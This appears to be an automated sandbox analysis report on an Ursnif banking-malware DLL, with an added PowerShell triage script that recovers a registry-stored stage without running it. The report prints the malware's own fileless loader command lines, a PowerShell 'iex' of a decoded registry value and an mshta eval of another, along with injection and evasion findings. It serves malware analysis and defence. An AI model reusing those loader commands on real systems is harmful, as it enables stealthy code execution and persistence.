Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001D.00000002.925789248.000002946AE90000.00000002.00000001.sdmp, csc.exe, 00000020.00000002.938527540.000001F33B7D0000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000024.00000002.1051265243.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: \fk.pdb$. source: powershell.exe, 0000001A.00000003.995503256.000001E7C3283000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000002.00000003.944587452.00000000064F0000.00000004.00000001.sdmp
Source: Binary string: c:\climbThrough\Bedclear\ranCentury\Exercise.pdb source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000002.00000003.944587452.00000000064F0000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000024.00000002.1051265243.0000000005A00000.00000002.00000001.sdmp
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
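The command line above is the loader's second stage: mshta.exe starts powershell.exe, which reads a REG_BINARY value (basebapi) from a GUID-named key under HKCU\Software\AppDataLow\Software\Microsoft, decodes it as ASCII and hands it straight to iex. Nothing touches disk, so the stage survives only in the hive. As an added triage example (not part of the report and not the malware's code), the following PowerShell recovers that stage from a live infected profile without executing it. The parent key path is the one in the report; the GUID-like key name is host-specific, so every matching subkey is enumerated. The script marker list and the output folder are assumptions, and the script name Recover-UrsnifStage.ps1 is hypothetical.

```powershell
# Added triage example; not from the sandbox report or from the malware.
# Recovers the stage that this sample's mshta.exe -> powershell.exe chain loaded with
#   iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:...\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
# but writes the bytes to disk for analysis instead of executing them.
# Assumptions: run on the live infected host in the affected user's session; the GUID-like
# key name in the report is host-specific, so every matching subkey is enumerated.

param(
    [string]$StagingRoot    = 'HKCU:\Software\AppDataLow\Software\Microsoft',   # parent of the key in the report
    [string]$KeyNamePattern = '^[0-9A-Fa-f]{8}(-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}$',
    [string]$OutDir         = (Join-Path $env:TEMP 'ursnif-triage')
)

New-Item -ItemType Directory -Path $OutDir -Force | Out-Null

# Tokens that mark a decoded blob as script rather than config data (assumed heuristics).
$scriptMarkers = 'Add-Type', 'IEX', 'Invoke-Expression', 'FromBase64String', 'VirtualAlloc', 'kernel32', 'DllImport'

Get-ChildItem -Path $StagingRoot -ErrorAction SilentlyContinue |
    Where-Object { $_.PSChildName -match $KeyNamePattern } |
    ForEach-Object {
        $key   = $_
        $props = Get-ItemProperty -Path $key.PSPath

        foreach ($name in $key.GetValueNames()) {
            if ([string]::IsNullOrEmpty($name)) { continue }          # skip the (default) value
            $raw = $props.$name
            if ($raw -isnot [byte[]]) { continue }                    # stages are REG_BINARY

            # Same decode the malware used, without the iex.
            $text     = [System.Text.Encoding]::ASCII.GetString($raw)
            $isScript = [bool]($scriptMarkers | Where-Object { $text -match [regex]::Escape($_) })

            $safeName = ('{0}_{1}' -f $key.PSChildName, $name) -replace '[^\w\-]', '_'
            $binPath  = Join-Path $OutDir "$safeName.bin"
            [System.IO.File]::WriteAllBytes($binPath, $raw)           # exact bytes, for hashing and YARA

            $flat = $text -replace '[^\x20-\x7E]', '.'
            [pscustomobject]@{
                Key             = $key.PSChildName
                Value           = $name
                Bytes           = $raw.Length
                SHA256          = (Get-FileHash -Path $binPath -Algorithm SHA256).Hash
                LooksLikeScript = $isScript
                Preview         = $flat.Substring(0, [Math]::Min(80, $flat.Length))
                SavedTo         = $binPath
            }
        }
    }
```

Run it as the affected user (the key lives in that user's HKCU) and submit the .bin files rather than the decoded text: the bytes are what the YARA matches further down this report were written against. Legitimate subkeys under AppDataLow\Software\Microsoft (for example Internet Explorer) are excluded by the GUID pattern, and any value whose decoded form carries Add-Type or IEX is flagged LooksLikeScript so the stage is easy to spot among configuration blobs.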
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fcanujkk\fcanujkk.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\m5xmn43s\m5xmn43s.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fcanujkk\fcanujkk.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\m5xmn43s\m5xmn43s.cmdline'
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FA95DC LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_05FA95DC
Registers a DLL
Source: unknown Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dll
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FC6E10 push ecx; ret 2_2_05FC6E19
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FC7177 push ecx; ret 2_2_05FC7187
Source: C:\Windows\explorer.exe Code function: 36_2_04DCC131 push 3B000001h; retf 36_2_04DCC136
Source: initial sample Static PE information: section name: .text entropy: 6.87784518477

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\m5xmn43s\m5xmn43s.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\fcanujkk\fcanujkk.dll

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000002.00000003.860537429.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860574233.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860667381.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860601592.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860502446.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860680858.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.998924828.0000000005FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.876294685.00000000059AB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.938337595.0000000003320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860649674.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860628580.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6988, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFABB035200
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFABB03521C
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\explorer.exe Registry key monitored for changes: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550
Disables application error messages (SetErrorMode)
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX (1 occurrence)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (93 occurrences)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX (26 occurrences)
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX (1 occurrence)
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX (4 occurrences)

Malware Analysis System Evasion:

Uses ping.exe to sleep
Source: unknown Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\control.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3455
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5616
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\m5xmn43s\m5xmn43s.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\fcanujkk\fcanujkk.dll
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 204 Thread sleep count: 50 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6980 Thread sleep count: 35 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6980 Thread sleep count: 35 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6980 Thread sleep count: 45 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6980 Thread sleep count: 70 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6008 Thread sleep time: -7378697629483816s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FC4FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 2_2_05FC4FE1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FAE0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 2_2_05FAE0BA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FB888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 2_2_05FB888D
Source: C:\Windows\explorer.exe Code function: 36_2_04DAECE0 RtlAllocateHeap,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose, 36_2_04DAECE0
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FB05EF wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 2_2_05FB05EF
Source: explorer.exe, 00000024.00000000.973509151.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000024.00000000.980269639.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000024.00000000.975003491.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000024.00000000.980269639.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000024.00000002.1048815971.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000024.00000000.973509151.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000024.00000000.980902186.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000024.00000000.973509151.00000000058C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000024.00000000.980902186.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: explorer.exe, 00000024.00000000.973509151.00000000058C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FA95DC LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_05FA95DC
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FC16A5 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 2_2_05FC16A5

HIPS / PFW / Operating System Protection Evasion:

Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\m5xmn43s\m5xmn43s.0.cs
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: BD4F1580
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 9F0000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 7FFABD4F1580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 3110000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 7FFABD4F1580 value: 40
Maps a DLL or memory area into another process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Program Files\internet explorer\iexplore.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3424
Source: C:\Windows\explorer.exe Thread register set: target process: 3656
Source: C:\Windows\explorer.exe Thread register set: target process: 4268
Source: C:\Windows\explorer.exe Thread register set: target process: 4772
Source: C:\Windows\explorer.exe Thread register set: target process: 5876
Source: C:\Windows\explorer.exe Thread register set: target process: 6272
Source: C:\Windows\explorer.exe Thread register set: target process: 4112
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7D01D12E0
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7D01D12E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 9F0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 3110000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fcanujkk\fcanujkk.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\m5xmn43s\m5xmn43s.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES352.tmp' 'c:\Users\user\AppData\Local\Temp\fcanujkk\CSC3173F20A33D44EE3A49D2AFD78C0E6C5.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1BBC.tmp' 'c:\Users\user\AppData\Local\Temp\m5xmn43s\CSCBE8D23AB53C749FF947299C54732EF79.TMP'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Very long cmdline option found; this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: explorer.exe, 00000024.00000000.955462223.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000024.00000002.1037964161.0000000001080000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000024.00000000.974965650.0000000005E50000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000024.00000002.1037964161.0000000001080000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000024.00000002.1037964161.0000000001080000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000024.00000000.980902186.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FB04D7 cpuid 2_2_05FB04D7
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number, etc.) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
